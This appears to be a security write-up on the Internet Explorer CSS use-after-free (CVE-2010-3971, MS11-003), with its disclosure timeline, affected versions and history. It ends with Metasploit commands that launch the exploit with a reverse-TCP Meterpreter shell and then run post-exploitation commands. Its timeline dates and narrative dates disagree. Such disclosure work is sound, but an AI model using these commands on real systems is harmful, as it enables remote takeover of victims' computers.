Timeline :

Vulnerability discovered the 2010-11-29 by WooYun
Vulnerability disclosed the 2010-12-08 by WooYun
Vulnerability confirmed the 2010-12-09 by VUPEN Security
Vulnerability explained the 2010-12-16 by Nephi Johnson
Exploit released the 2010-12-20 by jduck

    PoC provided by :

WooYun
d0c_s4vage
Nephi Johnson
jduck

    Reference(s) :

OSVDB-69796
SA42510
SA 2488013
CVE-2010-3971
EDB-ID-15708
EDB-ID-15746
MS11-003

Affected version(s) :

Internet Explorer 8

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2, Windows 7 32, Windows 7 x64, Windows Server 2008 R2 x64

Internet Explorer 7

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2

Internet Explorer 6

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2

Tested on Windows XP SP3 with :

Internet Explorer 8 (mshtml.dll 8.0.6001.18999)

Description :

In the continuity of Internet Explorer 0day’s how are disclosed and not directly acknowledged, here is “Microsoft IE CSS Use After Free“, a new vulnerability how allow to gain complete control on a vulnerable computer.

This vulnerability has been discovered the 29 November and publicly disclosed the 10 December by WooYun a chinese company. But at this time, the vulnerability was perceived as a basic remote denial of service (DoS). The 11 December, VUPEN Security, has confirm the vulnerability but with a different analysis of the vulnerability impact. The vulnerability was no more just a DoS, but could permit remote code execution to gain control on vulnerable computers. Unfortunately Microsoft didn’t directly response to the WooYun disclosure and to the VUPEN analysis.

The 16 December, Nephi Johnson, a security researcher from BreakingPoint, has confirm the VUPEN vulnerability impact analysis, by providing a detailed analysis of the vulnerability and a PoC. We encourage you to read the Nephi Johnson article “When A DoS Isn’t A DoS“.

Enough vulnerability details where provided to permit, to the Metasploit Team, to create a PoC how is evading ASLR (Address Space Layout Randomization) and bypassing DEP (Data Execution Prevention).

The 23 December, Microsoft has finally acknowledge the vulnerability (SA2488013) and recommend to mitigate the vulnerability to install and use EMET (Enhanced Mitigation Experience Toolkit).

    Commands :

use exploit/windows/browser/ms11_003_ie_css_­import
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig